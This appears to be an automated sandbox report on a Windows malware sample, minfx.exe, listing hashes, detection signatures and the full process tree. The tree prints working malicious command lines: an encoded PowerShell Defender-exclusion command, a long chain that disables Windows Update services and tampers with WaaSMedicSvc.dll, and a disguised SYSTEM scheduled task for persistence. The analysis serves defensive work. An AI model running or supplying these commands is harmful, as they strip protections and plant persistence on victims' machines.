General
Target: minfx.exe
Filesize: 4MB
Completed: 13-05-2022 17:57
Task: behavioral1
Score: 8/10
MD5: 8268ff95b3aaea6d6de8f02a73c323d2
SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Malware Config
Signatures 11

Defense Evasion
Impact
Persistence
  • Executes dropped EXE
    updater.exe

    Reported IOCs

    pid   process
    1036  updater.exe
  • Possible privilege escalation attempt
    takeown.exe icacls.exe

    Reported IOCs

    pid   process
    1296  takeown.exe
    688   icacls.exe
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Loads dropped DLL
    cmd.exe

    Reported IOCs

    pid   process
    1784  cmd.exe
  • Modifies file permissions
    takeown.exe icacls.exe

    TTPs

    File Permissions Modification

    Reported IOCs

    pid   process
    1296  takeown.exe
    688   icacls.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    description: File opened for modification
    ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
    process: powershell.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid   process
    1608  schtasks.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe conhost.exe

    Reported IOCs

    pid   process
    1632  powershell.exe
    1092  conhost.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe powercfg.exe powercfg.exe powercfg.exe powercfg.exe conhost.exe

    Reported IOCs

    description                  pid   process
    Token: SeDebugPrivilege      1632  powershell.exe
    Token: SeShutdownPrivilege   1544  powercfg.exe
    Token: SeShutdownPrivilege   896   powercfg.exe
    Token: SeShutdownPrivilege   1784  powercfg.exe
    Token: SeShutdownPrivilege   364   powercfg.exe
    Token: SeDebugPrivilege      1092  conhost.exe
  • Suspicious use of WriteProcessMemory
    minfx.exe conhost.exe cmd.exe cmd.exe cmd.exe cmd.exe

    Reported IOCs

    description                        pid   process      target process
    PID 1992 wrote to memory of 1092   1992  minfx.exe    conhost.exe
    PID 1092 wrote to memory of 1836   1092  conhost.exe  cmd.exe
    PID 1836 wrote to memory of 1632   1836  cmd.exe      powershell.exe
    PID 1092 wrote to memory of 588    1092  conhost.exe  cmd.exe
    PID 1092 wrote to memory of 776    1092  conhost.exe  cmd.exe
    PID 588 wrote to memory of 1156    588   cmd.exe      sc.exe
    PID 588 wrote to memory of 1660    588   cmd.exe      sc.exe
    PID 776 wrote to memory of 1544    776   cmd.exe      powercfg.exe
    PID 588 wrote to memory of 1000    588   cmd.exe      sc.exe
    PID 588 wrote to memory of 1760    588   cmd.exe      sc.exe
    PID 588 wrote to memory of 1620    588   cmd.exe      sc.exe
    PID 776 wrote to memory of 896     776   cmd.exe      powercfg.exe
    PID 588 wrote to memory of 1696    588   cmd.exe      sc.exe
    PID 776 wrote to memory of 1784    776   cmd.exe      powercfg.exe
    PID 776 wrote to memory of 364     776   cmd.exe      powercfg.exe
    PID 588 wrote to memory of 1444    588   cmd.exe      sc.exe
    PID 588 wrote to memory of 1736    588   cmd.exe      sc.exe
    PID 1092 wrote to memory of 2032   1092  conhost.exe  cmd.exe
    PID 588 wrote to memory of 1100    588   cmd.exe      sc.exe
    PID 2032 wrote to memory of 1608   2032  cmd.exe      schtasks.exe
    PID 588 wrote to memory of 904     588   cmd.exe      sc.exe
Processes 44
  • C:\Users\Admin\AppData\Local\Temp\minfx.exe
    "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
    Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
        Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1632
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN 
"\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1156
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1660
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1000
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:1760
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1620
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:1696
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:1444
        • C:\Windows\system32\sc.exe
          sc config bits start= disabled
          PID:1736
        • C:\Windows\system32\sc.exe
          sc failure bits reset= 0 actions= ""
          PID:1100
        • C:\Windows\system32\sc.exe
          sc config dosvc start= disabled
          PID:904
        • C:\Windows\system32\sc.exe
          sc failure dosvc reset= 0 actions= ""
          PID:1576
        • C:\Windows\system32\sc.exe
          sc config UsoSvc start= disabled
          PID:1772
        • C:\Windows\system32\sc.exe
          sc failure UsoSvc reset= 0 actions= ""
          PID:1832
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:660
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:692
        • C:\Windows\system32\takeown.exe
          takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1296
        • C:\Windows\system32\icacls.exe
          icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:688
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
          PID:580
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
          PID:1844
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
          PID:908
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          PID:1436
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          PID:456
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          PID:1668
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
          PID:932
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
          PID:1320
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
          PID:1960
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
          PID:1988
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
          PID:1004
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
          PID:1512
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          PID:824
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1544
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:896
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:364
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          Creates scheduled task(s)
          PID:1608
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Loads dropped DLL
        PID:1784
        • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          Executes dropped EXE
          PID:1036
Network
Downloads
  • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
    MD5: 8268ff95b3aaea6d6de8f02a73c323d2
    SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
    SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
    SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
